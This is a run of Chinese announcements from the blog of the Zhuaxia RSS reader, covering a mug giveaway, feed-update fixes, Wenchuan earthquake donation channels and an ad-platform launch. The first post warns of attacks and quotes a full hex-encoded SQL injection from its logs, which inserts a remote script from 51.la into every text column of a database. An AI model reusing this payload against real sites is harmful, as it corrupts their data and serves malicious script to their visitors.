抓虾日记

今天在抓虾的日志日常统计中，发现了很多奇怪的日志，例如“zhuaxia.com GET /i/574788694?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×44 45434C415245204054207661726368617228323535292C404320766172636861722832353529204445

434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E61

6D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220

776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E7874

7970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E

78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046

524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443

485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D2073

6574205B272B40432B275D3D727472696D28636F6E7665727428766172636861722C5B272B40432B27

5D29292B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7573

6572732E35312E6C612F313938313136322E6A73223E3C2F7363726970743E3C212D2D272720776865

726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726970742073

72633D22687474703A2F2F6A732E75736572732E35312E6C612F313938313136322E6A73223E3C2F73

63726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F43757273

6F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C

4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0”

中间是加密的部分，解密后是“DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’] set [’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+'’”>”。

携带这种注入代码的请求涉及12000多个IP，我们怀疑是部分用户的浏览器被装上了恶意插件，请大家注意保护自己的机器，并及时升级自己的防毒软件。

同时请广大blogger和站长们注意，检查自己的web程序，防止注入攻击。

关于“51.la”是什么来头，如果有知情人，不妨说说 ：）

祝大家周末愉快 ：）

为了感谢虾米们对“抓虾互动营销平台”的支持，抓虾为前300名注册 “抓虾挂件”或“抓虾博客作家”的用户发放了限量版的抓虾马克杯。这下可忙坏了小虾哦，不仅要将每个杯子包得严严实实的，而且还要反复发邮件确认虾米们的地址和联系方式。不过最后看到虾米们都开心地收到了杯子，很多人还把自己收到杯子开心的心情写在博客上，小虾们的心里真是比蜜糖还甜~在这里小虾将一些虾米的经典语录拿出来和大家分享，希望能将快乐传达给每一个人！

公牛挤奶：那是一個普通的瓷杯子，上面有两个字——抓虾，特別之处在于它是从北京中关村邮寄过来的的，邮费可能比杯子本身还要贵。千里送鹅毛，礼轻情意重。
抓虾小语：别说公牛挤奶在香港啦，就算公牛挤奶住在火星，抓虾也会坐飞船把杯子送到哦：）

完美壁纸：嘎嘎……虽然是一个杯子，不过觉得挺不错的，挺有纪念价值的！嘿嘿，诸位不要羡慕了。不过运气不错，感谢完美壁纸带给rain的运气！
抓虾小语：虾米们如果羡慕的话，记得下次参加抓虾的活动哦！机会多多！礼品多多！

鲜甜IT.Net：抓虾MM说看到我BLOG里写到杯子已经碎了，决定给我补寄一个。WOW，抓虾真是可爱啊。收到杯子发现碎掉其实跟抓虾一点关系都没有。他们的包装很细致，包得很好。可能是路上受了挤压碎掉的。要知道北京到湖南可不近呢。
抓虾小语：抓虾希望每一个收到杯子的虾米都能够开心，这样我们做的一切才是有意义的。

香草吧噗：收到抓虾的礼物我自然很高兴，我也希望抓虾的互动营销平台能够尽快运作。blogger们能够多一种盈利的方式，自然是非常不错的。:)
抓虾小语：谢谢香草同学对抓虾和互动营销平台的支持。

猫言猫语：白色的杯身，印上一个抓虾的LOGO，显得十分干净、简洁，很喜欢这样的颜色搭配，要是在这样的杯子里，放上黄色的薯条，或者淡红的虾条。那就更好看了~~ 抓虾小语：猫同学的想象力真是丰富，想象着“放上黄色的薯条，或者淡红的虾条”的杯子，小虾们都流口水了呢~~~嘿嘿~

农民李威：马克杯已经在电脑桌前放了一天，准备晚上开始启用。总得洗洗涮刷吧。之前我喝水总是用可口可乐的火炬杯，看来这个天下，它们2个杯子得一分为2了。

抓虾小语：有点“坐享齐人之福”的味道啊。

以上就是可爱的虾米们的“杯子语录”。因为空间的关系无法将语录全部收录，但在这里已经看到了大家对抓虾的喜爱和关注。
在这里抓虾要谢谢长久以来所有虾米们的理解和支持，小虾们一直努力的向前游。

各位朋友大家好,今天有网友反应 牛博网 的rss地址中的原文连接出现错误，经工程师确认，是牛博网在输出了错误的连接地址。我们已经与牛博网进行了电话联系，我们会合作尽快解决这个问题。

在问题解决以前，大家可以按以下方法访问牛博的原文，错误的地址为“http://www.bullog.cn~/blogs/lianyue/archives/144381.aspx”，多了一个“~”，大家可以将“~”去掉后访问原文。

各位朋友大家好，今天抓虾升级了用户登录和认证机制，如您在使用过程中发现问题，重新登录即可。

给大家带来了不便，请大家原谅。 ：）

灾害发生后的10分钟，抓虾的博客搜索页面上出现了3000多条关于地震的文章。到今天搜索汶川 地震的结果已经到达26734篇。中国的Bloger们对突发事件关注的身段之快，着实让人惊讶。

这当中很多是经历灾难者的亲身经历，但更多的是面对灾难大家守望相助的态度，和困难面前尽一份绵薄之力的大爱。很多Bloger在呼吁“自己捐款的力量是微小的，我们该动员一切能动员的力量。”所谓众志成城，守望相助就是这样吧。

四川，今夜请不要哭泣。因为，我们在一起。

1、银行汇款：

开户单位：中国红十字会总会

人民币开户行：中国工商银行北京分行东四南支行

人民币账号：0200001009014413252

外币开户行：中信银行酒仙桥支行

外币账号：7112111482600000209

热线电话：(8610)65139999

2、网上捐款:

登陆中国红十字会总会网站：www.redcross.org.cn

点击捐款热线栏目进行在线捐款。（目前人数过多，无法访问）

通过银行、邮局和网上捐款在捐款时请注明捐款人姓名、通信地址、捐款意向

如：四川地震捐款等信息，以便邮寄捐赠收据和感谢信。

3、中国红十字基金会同时也接受社会各界捐赠：

地址： 北京市东城区东单北大街干面胡同53号

邮编：100010

银行汇款：

户名： 中国红十字基金会

开户银行： 中国银行北京分行

账号： 800100921908091001

开户银行：中国工商银行北京东四南支行

账号：0200001019014483874

开户银行：中国建设银行北京朝内大街支行

账号：11001070300059000427

外币开户银行：中国银行

账号： 800100086608091014

捐款热线电话： 010-65124154 010-65129947 010-65599176

4、短信捐助：

通过短信捐款：中国移动、中国联通手机用户

以及中国电信、中国网通小灵通用户均可编辑短信1或2，发送至1069999301

即向“红十字救援行动”捐款1元钱或2元钱。

中国网通小灵通用户均可编辑短信“中国红十字会”

发送至12114，即可了解中国红十字会有关情况。

（已经确认，能够通过此途径捐赠。短信发送后，有确认短信回复）

5、招商银行信用卡持卡人

可以直接发送短信JK50或JK100至特定号码（移动1065795555或联通1065502010095555）

即由该信用卡账户为四川灾区的儿童及家庭捐助50或100元。

6、为方便公众捐款，筹集更多资金

壹基金开通短信捐款，捐款号码为1069 999309。

如果您愿意捐1或2元

可以发送短信1或2到1069 999309。

如果您愿意每月捐款5元或10元或15元

可以发送短信MY5或MY10或MY15到1069 999309。

这里是相关号码出处

http://news.sohu.com/20080512/n256808674.shtml

http://gongyi.qq.com/juanzeng/llj_dizhen.htm

7、河北省红十字会紧急为四川地震灾区募捐

省红十字会救灾捐款热线：0311-85989809、85989890

节假日和夜间电话：0311—87046792

开户行：中行石家庄市泰华支行

账号：00330208091001 >>详细

8、阿坝州慈善总会接受汶川地震捐助的账号及联系电话

开户行：农行马尔康县分行

户名：阿坝藏族羌族自治州慈善总会

账号：22-603401040014871

联系电话：

0837—2822696（阿坝州民政局办公室）

0837—2821503（阿坝州民政局办公室传真）

0837—2832392（阿坝州慈善总会办公室传真）

0837—2823473（阿坝州民政局救灾科）

0837—8293893（联系人：周邦华）

13408378588（联系人：周邦华）

9、青海红十字会关于支援四川地震灾区的紧急呼吁

捐款接收单位：青海省红十字会

开户行：建行北大街支行

帐号：63001513737050016350

救灾捐款热线：0971-8252284、8252040、8214589

传真：0971-8252292

10、陕西救灾募捐办公室公布电话

户名：陕西省救灾募捐办公室

帐号：3700021309024903702

开户行：工行东新街分理处（新城）0102053

联系人：罗忠沐 电话：029-85768335； 029-85768336

地址：陕西省西安市解放路177号钻石国际商务中心11层1123室（东七路西口、火车站广场南１００米）

11、海南省红十字会呼吁为四川地震灾区募捐

捐款电话：0898-65331817、0898-65331824

传真：0898-65304627

接收捐赠方式：

1、银行转帐：

开户行：中国工商银行海口市国兴大道分理处

户名：海南省红十字会

账号：2201028629024900508

2、邮局汇款：

收款人：海南省红十字会 地址：海口市流芳路8号

邮编：571100

3、捐款点：

(1)海南省红十字会及各级红十字会

海南省红十字会，地址：海南省海口市流芳路8号

(2)海口宾馆，地址：海口市海府路4号

(3)海南金宝莱商务酒店，地址：海口市城西路18号地税大厦

(4)荣域营销中心，地址：海口市海甸岛海景路77号

12、香港地区捐助方式

香港红十字会捐款链接 https://www.redcross.org.hk/donation/user_donation.asp

(接受法国信用卡)

香港世界宣明会四川地震救灾专项捐助网页

https://www.worldvision.org.hk/donation/i-donation.asp?lang=c

香港乐施会四川地震捐款网页

https://www.oxfam.org.hk/public/donate/donate?donate_id=45

13、台湾地区捐助方式(感谢Vista提供)

民众可利用邮政划拨账号「0504-6467」

捐款户名「中华民国红十字会总会（请注明四川赈灾）」

信用卡捐款请上www.redcross.org.tw红十字会网站下载捐款表格填写

并注明四川赈灾，再传真到（02）23635154 或（02）23639646

银行转帐捐款也可行

账号是「华南银行和平分行121-20-015 5861」

户名「中华民国红十字会总会（请注明四川赈灾）」

并将转帐收据注明姓名、电话、住址后

传真至（02）23635154 或（02）23639646即可。

14、海外地区捐助方式

加拿大红十字会网上捐款

https://www.paypaq.com/redcross/new/index.php

(在Fund Designation 那一栏选”China Earthquake)

(SVTN)Silicon Valley Tsinghua Network

硅谷清华联网是硅谷地区清华的校友会，成立于1994年。

所有的捐款都会100％的转给中国红十字会。网页上有捐款信息

可以通过海外银行转帐、支票、以及PayPal用信用卡捐款

http://tsinghuafoundation.org/earthquake08/index.html (海外推荐)

理智捐助 尽力所能及。

15、红十字会和易宝支付的捐款网址: http://gongyi.yeepay.com
感谢我们爱讲冷笑话的易水寒提供上述较为全面的捐助方式，谢谢！

“我们要把世界变个样，我们厌倦了白白的辛劳，光得到仅能糊口的工饷，从没有时间让我们去思考。我们要闻闻花香，我们要晒晒太阳”这是1884年的美加大罢工中，工人们的心声，之后就有了“五一国际劳动节”。

大家的劳动节过的如何？小虾们也没有闲着哦，致力于“深度挖掘博客资源，帮助提高博客自身价值，将博客主利益最大化”的“抓虾互动营销平台”来了。

现在就来报告一下进展：

“抓虾互动营销平台”第一阶段开启两个功能，一是广告盈利工具——抓虾挂件。

区别于传统联盟广告类型杂乱，“抓虾挂件”为博客主带来高端的品牌广告客户，并同时提供几种实用功能，在广告闲置时依然能为博客带来增值功能。最重要的是，我们期望争取到更具竞争力的价格。

另一个功能是前期已经做过一些预热的“抓虾博客作家”。（详情见《抓虾隆重推出“特约博客作家”》。另，现正式更名为“抓虾博客作家”）

“抓虾博客作家”在发起大家为一个主题写作的同时，我们更乐于发现有潜质的博客作家，帮助其博客的推广，提升博客自身的价值。

上述内容诚挚邀请抓虾网用户开始内测。内测期间暂时没有广告投入。现在前300名提供有效数据并成功加入者，将得到限量版抓虾礼品。

顺便再偷偷透露一下，市场部的MM们还打算对5月31日之前挂上挂件的虾米们制定额外奖励呢。

让大家的劳动产生更大的价值，我们一起来把世界变个样吧！

自5月以来，Sina的博客更新出现不及时的现象。我们的工程师已经进行了升级，以后大家就能及时看到最新的更新了。

这次出现部分更新问题的原因是Sina对博客空间进行系统更新，从而导致有部分的RSS输出源不能给出实际的更新数据。

如果大家还发现有什么情况请给我们发邮件或者在下面回帖，这次能发现这个情况也要归功于大家的反馈，相信我们一起努力一定会克服所有的困难。

小虾在这里再次感谢虾米的支持！

自4月24号以来，来自ycool.com网的feed地址相继停止更新，经工程师检查，发现ycool.com输出的rss已经停止更新。我们已经与歪酷博客取得联系，相信这个问题很快会解决，请大家不要着急。

如果发现更新问题，请向我们反馈，我们的邮件地址是 zhuaxia@zhuaxia.com